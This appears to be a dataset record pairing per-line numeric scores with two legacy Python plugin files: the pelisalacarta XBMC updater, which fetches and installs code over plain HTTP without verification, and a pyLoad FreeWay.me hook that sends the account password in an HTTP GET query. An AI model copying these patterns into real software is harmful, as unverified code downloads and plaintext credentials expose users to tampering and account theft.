[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0, 0, 1, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0.045454545454545456, 0.125, 0, 0.2, 0, 0.1111111111111111, 0, 0.02, 0.1111111111111111, 0.012658227848101266, 0.015151515151515152, 0, 0.013157894736842105, 0.01282051282051282, 0.012658227848101266, 0.012345679012345678, 0, 0.2, 0.14285714285714285, 0.6666666666666666, 0.037037037037037035, 0, 0.1, 0, 0, 0.1111111111111111, 0, 0.01282051282051282, 0.016129032258064516, 0, 0, 0, 0, 0.25, 0.2, 0.02702702702702703, 0, 0.012658227848101266, 0.012658227848101266, 0.013333333333333334, 0, 0.2, 0, 0.016666666666666666, 0.012345679012345678, 0, 0.1111111111111111, 0, 0.01282051282051282, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0.0125, 0.0125, 0, 0.2, 0, 0.2, 0.009433962264150943, 0.009433962264150943, 0.043478260869565216, 0.07692307692307693, 0.030303030303030304, 0.030303030303030304, 0.125, 0.03571428571428571, 0, 0.1, 0.012987012987012988, 0, 0.1111111111111111, 0, 0.013333333333333334, 0.01282051282051282, 0.1111111111111111, 0, 0.020833333333333332, 0, 0.2, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.021739130434782608, 0, 0.03333333333333333, 0.2, 0.02857142857142857, 0, 0, 0, 0, 0.043478260869565216, 0.020833333333333332, 0.01282051282051282, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0.033707865168539325, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0.2, 0.014705882352941176, 0.013513513513513514, 0, 0.2, 0, 0.2, 0.013333333333333334, 0, 0, 0, 0, 0.1111111111111111, 0.1111111111111111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02631578947368421, 0 ]
217
0.03297
false
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta # XBMC Plugin #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os import sys import scrapertools import time import config import logger PLUGIN_NAME = "pelisalacarta" # FIXME: Esto está repetido en el channelselector, debería ir a config thumbnail_type = config.get_setting("thumbnail_type") if thumbnail_type=="": thumbnail_type="2" logger.info("thumbnail_type="+thumbnail_type) if thumbnail_type=="0": IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/posters/' elif thumbnail_type=="1": IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/banners/' elif thumbnail_type=="2": IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/squares/' ROOT_DIR = config.get_runtime_path() REMOTE_VERSION_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-version.xml" LOCAL_VERSION_FILE = os.path.join( ROOT_DIR , "version.xml" ) LOCAL_FILE = os.path.join( ROOT_DIR , PLUGIN_NAME+"-" ) try: # Añadida a la opcion : si plataforma xbmcdharma es "True", no debe ser con la plataforma de la xbox # porque seria un falso "True", ya que el xbmc en las xbox no son dharma por lo tanto no existen los addons logger.info("[updater.py] get_platform="+config.get_platform()) logger.info("[updater.py] get_system_platform="+config.get_system_platform()) if config.get_platform()=="xbmcdharma" and not config.get_system_platform() == "xbox": import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-addon-dharma-" DESTINATION_FOLDER = xbmc.translatePath( "special://home/addons") elif config.get_platform()=="xbmceden": import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-addon-eden-" DESTINATION_FOLDER = xbmc.translatePath( "special://home/addons") elif config.get_platform()=="xbmc": import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-plugin-" DESTINATION_FOLDER = xbmc.translatePath( "special://home/plugins/video") elif config.get_platform()=="wiimc": REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-wiimc-" DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),"..") elif config.get_platform()=="rss": REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-rss-" DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),"..") except: import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-plugin-" DESTINATION_FOLDER = xbmc.translatePath( os.path.join( ROOT_DIR , ".." ) ) def checkforupdates(): logger.info("[updater.py] checkforupdates") # Descarga el fichero con la versión en la web logger.info("[updater.py] Verificando actualizaciones...") logger.info("[updater.py] Version remota: "+REMOTE_VERSION_FILE) data = scrapertools.cachePage( REMOTE_VERSION_FILE ) #logger.info("xml descargado="+data) patronvideos = '<tag>([^<]+)</tag>' matches = re.compile(patronvideos,re.DOTALL).findall(data) #scrapertools.printMatches(matches) versiondescargada = matches[0] logger.info("[updater.py] version descargada="+versiondescargada) # Lee el fichero con la versión instalada localFileName = LOCAL_VERSION_FILE logger.info("[updater.py] Version local: "+localFileName) infile = open( localFileName ) data = infile.read() infile.close(); #logger.info("xml local="+data) matches = re.compile(patronvideos,re.DOTALL).findall(data) #scrapertools.printMatches(matches) versionlocal = matches[0] logger.info("[updater.py] version local="+versionlocal) arraydescargada = versiondescargada.split(".") arraylocal = versionlocal.split(".") # local 2.8.0 - descargada 2.8.0 -> no descargar # local 2.9.0 - descargada 2.8.0 -> no descargar # local 2.8.0 - descargada 2.9.0 -> descargar if len(arraylocal) == len(arraydescargada): #logger.info("caso 1") hayqueactualizar = False for i in range(0, len(arraylocal)): #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i]) if int(arraydescargada[i]) > int(arraylocal[i]): hayqueactualizar = True # local 2.8.0 - descargada 2.8 -> no descargar # local 2.9.0 - descargada 2.8 -> no descargar # local 2.8.0 - descargada 2.9 -> descargar if len(arraylocal) > len(arraydescargada): #logger.info("caso 2") hayqueactualizar = False for i in range(0, len(arraydescargada)): #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i]) if int(arraydescargada[i]) > int(arraylocal[i]): hayqueactualizar = True # local 2.8 - descargada 2.8.8 -> descargar # local 2.9 - descargada 2.8.8 -> no descargar # local 2.10 - descargada 2.9.9 -> no descargar # local 2.5 - descargada 3.0.0 if len(arraylocal) < len(arraydescargada): #logger.info("caso 3") hayqueactualizar = True for i in range(0, len(arraylocal)): #print arraylocal[i], arraydescargada[i], int(arraylocal[i])>int(arraydescargada[i]) if int(arraylocal[i]) > int(arraydescargada[i]): hayqueactualizar = False elif int(arraylocal[i]) < int(arraydescargada[i]): hayqueactualizar = True break if (hayqueactualizar): logger.info("[updater.py] actualizacion disponible") # Añade al listado de XBMC import xbmcgui thumbnail = IMAGES_PATH+"Crystal_Clear_action_info.png" logger.info("thumbnail="+thumbnail) listitem = xbmcgui.ListItem( "Descargar version "+versiondescargada, thumbnailImage=thumbnail ) itemurl = '%s?action=update&version=%s' % ( sys.argv[ 0 ] , versiondescargada ) import xbmcplugin xbmcplugin.addDirectoryItem( handle = int(sys.argv[ 1 ]), url = itemurl , listitem=listitem, isFolder=True) # Avisa con un popup dialog = xbmcgui.Dialog() dialog.ok("Versión "+versiondescargada+" disponible","Ya puedes descargar la nueva versión del plugin\ndesde el listado principal") ''' except: logger.info("No se han podido verificar actualizaciones...") import sys for line in sys.exc_info(): logger.error( "%s" % line ) ''' def update(params): # Descarga el ZIP logger.info("[updater.py] update") remotefilename = REMOTE_FILE+params.get("version")+".zip" localfilename = LOCAL_FILE+params.get("version")+".zip" logger.info("[updater.py] remotefilename=%s" % remotefilename) logger.info("[updater.py] localfilename=%s" % localfilename) logger.info("[updater.py] descarga fichero...") inicio = time.clock() #urllib.urlretrieve(remotefilename,localfilename) from core import downloadtools downloadtools.downloadfile(remotefilename, localfilename) fin = time.clock() logger.info("[updater.py] Descargado en %d segundos " % (fin-inicio+1)) # Lo descomprime logger.info("[updater.py] descomprime fichero...") import ziptools unzipper = ziptools.ziptools() destpathname = DESTINATION_FOLDER logger.info("[updater.py] destpathname=%s" % destpathname) unzipper.extract(localfilename,destpathname) # Borra el zip descargado logger.info("[updater.py] borra fichero...") os.remove(localfilename) logger.info("[updater.py] ...fichero borrado") def get_channel_remote_url(channel_name): if channel_name<>"channelselector": remote_channel_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+PLUGIN_NAME+"/channels/"+channel_name+".py" remote_version_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+PLUGIN_NAME+"/channels/"+channel_name+".xml" else: remote_channel_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+channel_name+".py" remote_version_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+channel_name+".xml" logger.info("[updater.py] remote_channel_url="+remote_channel_url) logger.info("[updater.py] remote_version_url="+remote_version_url) return remote_channel_url , remote_version_url def get_channel_local_path(channel_name): # TODO: (3.2) El XML debería escribirse en el userdata, de forma que se leerán dos ficheros locales: el del userdata y el que está junto al py (vendrá con el plugin). El mayor de los 2 es la versión actual, y si no existe fichero se asume versión 0 if channel_name<>"channelselector": local_channel_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+".py" ) local_version_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+".xml" ) local_compiled_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+".pyo" ) else: local_channel_path = os.path.join( config.get_runtime_path() , channel_name+".py" ) local_version_path = os.path.join( config.get_runtime_path() , channel_name+".xml" ) local_compiled_path = os.path.join( config.get_runtime_path() , channel_name+".pyo" ) logger.info("[updater.py] local_channel_path="+local_channel_path) logger.info("[updater.py] local_version_path="+local_version_path) logger.info("[updater.py] local_compiled_path="+local_compiled_path) return local_channel_path , local_version_path , local_compiled_path def updatechannel(channel_name): logger.info("[updater.py] updatechannel('"+channel_name+"')") # Canal remoto remote_channel_url , remote_version_url = get_channel_remote_url(channel_name) # Canal local local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name) #if not os.path.exists(local_channel_path): # return False; # Version remota try: data = scrapertools.cachePage( remote_version_url ) logger.info("[updater.py] remote_data="+data) patronvideos = '<tag>([^<]+)</tag>' matches = re.compile(patronvideos,re.DOTALL).findall(data) remote_version = int(matches[0]) except: remote_version = 0 logger.info("[updater.py] remote_version=%d" % remote_version) # Version local if os.path.exists( local_version_path ): infile = open( local_version_path ) data = infile.read() infile.close(); logger.info("[updater.py] local_data="+data) patronvideos = '<tag>([^<]+)</tag>' matches = re.compile(patronvideos,re.DOTALL).findall(data) local_version = int(matches[0]) else: local_version = 0 logger.info("[updater.py] local_version=%d" % local_version) # Comprueba si ha cambiado updated = remote_version > local_version if updated: logger.info("[updater.py] updated") download_channel(channel_name) return updated def download_channel(channel_name): logger.info("[updater.py] download_channel('"+channel_name+"')") # Canal remoto remote_channel_url , remote_version_url = get_channel_remote_url(channel_name) # Canal local local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name) # Descarga el canal updated_channel_data = scrapertools.cachePage( remote_channel_url ) try: outfile = open(local_channel_path,"w") outfile.write(updated_channel_data) outfile.flush() outfile.close() logger.info("[updater.py] Grabado a " + local_channel_path) except: logger.info("[updater.py] Error al grabar " + local_channel_path) import sys for line in sys.exc_info(): logger.error( "%s" % line ) # Descarga la version (puede no estar) try: updated_version_data = scrapertools.cachePage( remote_version_url ) outfile = open(local_version_path,"w") outfile.write(updated_version_data) outfile.flush() outfile.close() logger.info("[updater.py] Grabado a " + local_version_path) except: import sys for line in sys.exc_info(): logger.error( "%s" % line ) if os.path.exists(local_compiled_path): os.remove(local_compiled_path)
[ "# -*- coding: utf-8 -*-\n", "#------------------------------------------------------------\n", "# pelisalacarta\n", "# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta\n", "# XBMC Plugin\n", "#------------------------------------------------------------\n", "\n", "import urlparse,urllib2,urllib,re\n", "import os\n", "import sys\n", "import scrapertools\n", "import time\n", "import config\n", "import logger\n", "\n", "PLUGIN_NAME = \"pelisalacarta\"\n", "\n", "# FIXME: Esto está repetido en el channelselector, debería ir a config\n", "thumbnail_type = config.get_setting(\"thumbnail_type\")\n", "if thumbnail_type==\"\":\n", " thumbnail_type=\"2\"\n", "logger.info(\"thumbnail_type=\"+thumbnail_type)\n", "if thumbnail_type==\"0\":\n", " IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/posters/'\n", "elif thumbnail_type==\"1\":\n", " IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/banners/'\n", "elif thumbnail_type==\"2\":\n", " IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/squares/'\n", "\n", "ROOT_DIR = config.get_runtime_path()\n", "\n", "REMOTE_VERSION_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-version.xml\"\n", "LOCAL_VERSION_FILE = os.path.join( ROOT_DIR , \"version.xml\" )\n", "LOCAL_FILE = os.path.join( ROOT_DIR , PLUGIN_NAME+\"-\" )\n", "\n", "try:\n", " # Añadida a la opcion : si plataforma xbmcdharma es \"True\", no debe ser con la plataforma de la xbox\n", " # porque seria un falso \"True\", ya que el xbmc en las xbox no son dharma por lo tanto no existen los addons\n", " logger.info(\"[updater.py] get_platform=\"+config.get_platform())\n", " logger.info(\"[updater.py] get_system_platform=\"+config.get_system_platform())\n", " if config.get_platform()==\"xbmcdharma\" and not config.get_system_platform() == \"xbox\":\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-addon-dharma-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( \"special://home/addons\")\n", " elif config.get_platform()==\"xbmceden\":\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-addon-eden-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( \"special://home/addons\")\n", " elif config.get_platform()==\"xbmc\":\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-plugin-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( \"special://home/plugins/video\")\n", " elif config.get_platform()==\"wiimc\":\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-wiimc-\"\n", " DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),\"..\")\n", " elif config.get_platform()==\"rss\":\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-rss-\"\n", " DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),\"..\")\n", "\n", "except:\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-plugin-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( os.path.join( ROOT_DIR , \"..\" ) )\n", "\n", "def checkforupdates():\n", " logger.info(\"[updater.py] checkforupdates\")\n", "\n", " # Descarga el fichero con la versión en la web\n", " logger.info(\"[updater.py] Verificando actualizaciones...\")\n", " logger.info(\"[updater.py] Version remota: \"+REMOTE_VERSION_FILE)\n", " data = scrapertools.cachePage( REMOTE_VERSION_FILE )\n", " #logger.info(\"xml descargado=\"+data)\n", " patronvideos = '<tag>([^<]+)</tag>'\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " #scrapertools.printMatches(matches)\n", " versiondescargada = matches[0]\n", " logger.info(\"[updater.py] version descargada=\"+versiondescargada)\n", " \n", " # Lee el fichero con la versión instalada\n", " localFileName = LOCAL_VERSION_FILE\n", " logger.info(\"[updater.py] Version local: \"+localFileName)\n", " infile = open( localFileName )\n", " data = infile.read()\n", " infile.close();\n", " #logger.info(\"xml local=\"+data)\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " #scrapertools.printMatches(matches)\n", " versionlocal = matches[0]\n", " logger.info(\"[updater.py] version local=\"+versionlocal)\n", "\n", " arraydescargada = versiondescargada.split(\".\")\n", " arraylocal = versionlocal.split(\".\")\n", " \n", " # local 2.8.0 - descargada 2.8.0 -> no descargar\n", " # local 2.9.0 - descargada 2.8.0 -> no descargar\n", " # local 2.8.0 - descargada 2.9.0 -> descargar\n", " if len(arraylocal) == len(arraydescargada):\n", " #logger.info(\"caso 1\")\n", " hayqueactualizar = False\n", " for i in range(0, len(arraylocal)):\n", " #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i])\n", " if int(arraydescargada[i]) > int(arraylocal[i]):\n", " hayqueactualizar = True\n", " # local 2.8.0 - descargada 2.8 -> no descargar\n", " # local 2.9.0 - descargada 2.8 -> no descargar\n", " # local 2.8.0 - descargada 2.9 -> descargar\n", " if len(arraylocal) > len(arraydescargada):\n", " #logger.info(\"caso 2\")\n", " hayqueactualizar = False\n", " for i in range(0, len(arraydescargada)):\n", " #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i])\n", " if int(arraydescargada[i]) > int(arraylocal[i]):\n", " hayqueactualizar = True\n", " # local 2.8 - descargada 2.8.8 -> descargar\n", " # local 2.9 - descargada 2.8.8 -> no descargar\n", " # local 2.10 - descargada 2.9.9 -> no descargar\n", " # local 2.5 - descargada 3.0.0\n", " if len(arraylocal) < len(arraydescargada):\n", " #logger.info(\"caso 3\")\n", " hayqueactualizar = True\n", " for i in range(0, len(arraylocal)):\n", " #print arraylocal[i], arraydescargada[i], int(arraylocal[i])>int(arraydescargada[i])\n", " if int(arraylocal[i]) > int(arraydescargada[i]):\n", " hayqueactualizar = False\n", " elif int(arraylocal[i]) < int(arraydescargada[i]):\n", " hayqueactualizar = True\n", " break\n", "\n", " if (hayqueactualizar):\n", " logger.info(\"[updater.py] actualizacion disponible\")\n", " \n", " # Añade al listado de XBMC\n", " import xbmcgui\n", " thumbnail = IMAGES_PATH+\"Crystal_Clear_action_info.png\"\n", " logger.info(\"thumbnail=\"+thumbnail)\n", " listitem = xbmcgui.ListItem( \"Descargar version \"+versiondescargada, thumbnailImage=thumbnail )\n", " itemurl = '%s?action=update&version=%s' % ( sys.argv[ 0 ] , versiondescargada )\n", " import xbmcplugin\n", " xbmcplugin.addDirectoryItem( handle = int(sys.argv[ 1 ]), url = itemurl , listitem=listitem, isFolder=True)\n", " \n", " # Avisa con un popup\n", " dialog = xbmcgui.Dialog()\n", " dialog.ok(\"Versión \"+versiondescargada+\" disponible\",\"Ya puedes descargar la nueva versión del plugin\\ndesde el listado principal\")\n", "\n", " '''\n", " except:\n", " logger.info(\"No se han podido verificar actualizaciones...\")\n", " import sys\n", " for line in sys.exc_info():\n", " logger.error( \"%s\" % line )\n", " '''\n", "def update(params):\n", " # Descarga el ZIP\n", " logger.info(\"[updater.py] update\")\n", " remotefilename = REMOTE_FILE+params.get(\"version\")+\".zip\"\n", " localfilename = LOCAL_FILE+params.get(\"version\")+\".zip\"\n", " logger.info(\"[updater.py] remotefilename=%s\" % remotefilename)\n", " logger.info(\"[updater.py] localfilename=%s\" % localfilename)\n", " logger.info(\"[updater.py] descarga fichero...\")\n", " inicio = time.clock()\n", " \n", " #urllib.urlretrieve(remotefilename,localfilename)\n", " from core import downloadtools\n", " downloadtools.downloadfile(remotefilename, localfilename)\n", " \n", " fin = time.clock()\n", " logger.info(\"[updater.py] Descargado en %d segundos \" % (fin-inicio+1))\n", " \n", " # Lo descomprime\n", " logger.info(\"[updater.py] descomprime fichero...\")\n", " import ziptools\n", " unzipper = ziptools.ziptools()\n", " destpathname = DESTINATION_FOLDER\n", " logger.info(\"[updater.py] destpathname=%s\" % destpathname)\n", " unzipper.extract(localfilename,destpathname)\n", " \n", " # Borra el zip descargado\n", " logger.info(\"[updater.py] borra fichero...\")\n", " os.remove(localfilename)\n", " logger.info(\"[updater.py] ...fichero borrado\")\n", "\n", "def get_channel_remote_url(channel_name):\n", " if channel_name<>\"channelselector\":\n", " remote_channel_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+PLUGIN_NAME+\"/channels/\"+channel_name+\".py\"\n", " remote_version_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+PLUGIN_NAME+\"/channels/\"+channel_name+\".xml\"\n", " else:\n", " remote_channel_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+channel_name+\".py\"\n", " remote_version_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+channel_name+\".xml\"\n", "\n", " logger.info(\"[updater.py] remote_channel_url=\"+remote_channel_url)\n", " logger.info(\"[updater.py] remote_version_url=\"+remote_version_url)\n", " \n", " return remote_channel_url , remote_version_url\n", "\n", "def get_channel_local_path(channel_name):\n", " # TODO: (3.2) El XML debería escribirse en el userdata, de forma que se leerán dos ficheros locales: el del userdata y el que está junto al py (vendrá con el plugin). El mayor de los 2 es la versión actual, y si no existe fichero se asume versión 0\n", " if channel_name<>\"channelselector\":\n", " local_channel_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+\".py\" )\n", " local_version_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+\".xml\" )\n", " local_compiled_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+\".pyo\" )\n", " else:\n", " local_channel_path = os.path.join( config.get_runtime_path() , channel_name+\".py\" )\n", " local_version_path = os.path.join( config.get_runtime_path() , channel_name+\".xml\" )\n", " local_compiled_path = os.path.join( config.get_runtime_path() , channel_name+\".pyo\" )\n", "\n", " logger.info(\"[updater.py] local_channel_path=\"+local_channel_path)\n", " logger.info(\"[updater.py] local_version_path=\"+local_version_path)\n", " logger.info(\"[updater.py] local_compiled_path=\"+local_compiled_path)\n", " \n", " return local_channel_path , local_version_path , local_compiled_path\n", "\n", "def updatechannel(channel_name):\n", " logger.info(\"[updater.py] updatechannel('\"+channel_name+\"')\")\n", " \n", " # Canal remoto\n", " remote_channel_url , remote_version_url = get_channel_remote_url(channel_name)\n", " \n", " # Canal local\n", " local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name)\n", " \n", " #if not os.path.exists(local_channel_path):\n", " # return False;\n", "\n", " # Version remota\n", " try:\n", " data = scrapertools.cachePage( remote_version_url )\n", " logger.info(\"[updater.py] remote_data=\"+data)\n", " patronvideos = '<tag>([^<]+)</tag>'\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " remote_version = int(matches[0])\n", " except:\n", " remote_version = 0\n", "\n", " logger.info(\"[updater.py] remote_version=%d\" % remote_version)\n", "\n", " # Version local\n", " if os.path.exists( local_version_path ):\n", " infile = open( local_version_path )\n", " data = infile.read()\n", " infile.close();\n", " logger.info(\"[updater.py] local_data=\"+data)\n", " patronvideos = '<tag>([^<]+)</tag>'\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " local_version = int(matches[0])\n", " else:\n", " local_version = 0\n", " \n", " logger.info(\"[updater.py] local_version=%d\" % local_version)\n", " \n", " # Comprueba si ha cambiado\n", " updated = remote_version > local_version\n", "\n", " if updated:\n", " logger.info(\"[updater.py] updated\")\n", " download_channel(channel_name)\n", "\n", " return updated\n", "\n", "def download_channel(channel_name):\n", " logger.info(\"[updater.py] download_channel('\"+channel_name+\"')\")\n", " # Canal remoto\n", " remote_channel_url , remote_version_url = get_channel_remote_url(channel_name)\n", " \n", " # Canal local\n", " local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name)\n", "\n", " # Descarga el canal\n", " updated_channel_data = scrapertools.cachePage( remote_channel_url )\n", " try:\n", " outfile = open(local_channel_path,\"w\")\n", " outfile.write(updated_channel_data)\n", " outfile.flush()\n", " outfile.close()\n", " logger.info(\"[updater.py] Grabado a \" + local_channel_path)\n", " except:\n", " logger.info(\"[updater.py] Error al grabar \" + local_channel_path)\n", " import sys\n", " for line in sys.exc_info():\n", " logger.error( \"%s\" % line )\n", "\n", " # Descarga la version (puede no estar)\n", " try:\n", " updated_version_data = scrapertools.cachePage( remote_version_url )\n", " outfile = open(local_version_path,\"w\")\n", " outfile.write(updated_version_data)\n", " outfile.flush()\n", " outfile.close()\n", " logger.info(\"[updater.py] Grabado a \" + local_version_path)\n", " except:\n", " import sys\n", " for line in sys.exc_info():\n", " logger.error( \"%s\" % line )\n", "\n", " if os.path.exists(local_compiled_path):\n", " os.remove(local_compiled_path)\n" ]
[ 0, 0.016129032258064516, 0, 0, 0, 0.016129032258064516, 0, 0.11764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0.043478260869565216, 0, 0.041666666666666664, 0, 0.038461538461538464, 0, 0.038461538461538464, 0, 0, 0, 0, 0.011111111111111112, 0.04838709677419355, 0.05357142857142857, 0, 0, 0.009523809523809525, 0.008928571428571428, 0, 0.012195121951219513, 0.02197802197802198, 0, 0.010309278350515464, 0.013513513513513514, 0.022727272727272728, 0, 0.010526315789473684, 0.013513513513513514, 0.025, 0, 0.01098901098901099, 0.024691358024691357, 0.024390243902439025, 0.011764705882352941, 0.013513513513513514, 0.02564102564102564, 0.012048192771084338, 0.013513513513513514, 0, 0.125, 0, 0.011494252873563218, 0.06329113924050633, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0.03508771929824561, 0.024390243902439025, 0.024390243902439025, 0.015873015873015872, 0.025, 0, 0, 0.2, 0, 0, 0, 0.05714285714285714, 0, 0.05, 0.027777777777777776, 0.015873015873015872, 0.025, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.020202020202020204, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.020202020202020204, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.020618556701030927, 0, 0.023809523809523808, 0, 0.024390243902439025, 0, 0, 0, 0, 0.1111111111111111, 0, 0, 0, 0, 0.028846153846153848, 0.06818181818181818, 0, 0.07758620689655173, 0.1111111111111111, 0, 0, 0.014285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.018518518518518517, 0, 0, 0.2, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0.2, 0, 0, 0, 0, 0, 0.023809523809523808, 0.075, 0.007142857142857143, 0.0070921985815602835, 0, 0.008695652173913044, 0.008620689655172414, 0, 0, 0, 0.2, 0.0196078431372549, 0, 0.023809523809523808, 0.003952569169960474, 0.075, 0.0423728813559322, 0.04201680672268908, 0.041666666666666664, 0, 0.043478260869565216, 0.043010752688172046, 0.0425531914893617, 0, 0, 0, 0, 0.2, 0.0273972602739726, 0, 0.030303030303030304, 0, 0.2, 0, 0.024096385542168676, 0.2, 0, 0.02857142857142857, 0.2, 0.020833333333333332, 0, 0, 0, 0, 0.03333333333333333, 0, 0.022222222222222223, 0.014925373134328358, 0, 0.08333333333333333, 0, 0, 0, 0, 0, 0.044444444444444446, 0.045454545454545456, 0, 0.041666666666666664, 0, 0.022222222222222223, 0.014925373134328358, 0, 0, 0, 0.2, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.027777777777777776, 0, 0, 0.024096385542168676, 0.2, 0, 0.02857142857142857, 0, 0, 0.027777777777777776, 0, 0.02127659574468085, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0, 0.05, 0, 0, 0, 0.02631578947368421, 0.02127659574468085, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0.05, 0, 0, 0 ]
295
0.021046
false
# -*- coding: utf-8 -*- from module.plugins.internal.MultiHook import MultiHook class FreeWayMeHook(MultiHook): __name__ = "FreeWayMeHook" __type__ = "hook" __version__ = "0.18" __status__ = "testing" __config__ = [("pluginmode" , "all;listed;unlisted", "Use for plugins" , "all"), ("pluginlist" , "str" , "Plugin list (comma separated)", "" ), ("reload" , "bool" , "Reload plugin list" , True ), ("reloadinterval", "int" , "Reload interval in hours" , 12 )] __description__ = """FreeWay.me hook plugin""" __license__ = "GPLv3" __authors__ = [("Nicolas Giese", "james@free-way.me")] def get_hosters(self): user, info = self.account.select() hostis = self.load("http://www.free-way.bz/ajax/jd.php", get={'id' : 3, 'user': user, 'pass': info['login']['password']}).replace("\"", "") #@TODO: Revert to `https` in 0.4.10 return [x.strip() for x in hostis.split(",") if x.strip()]
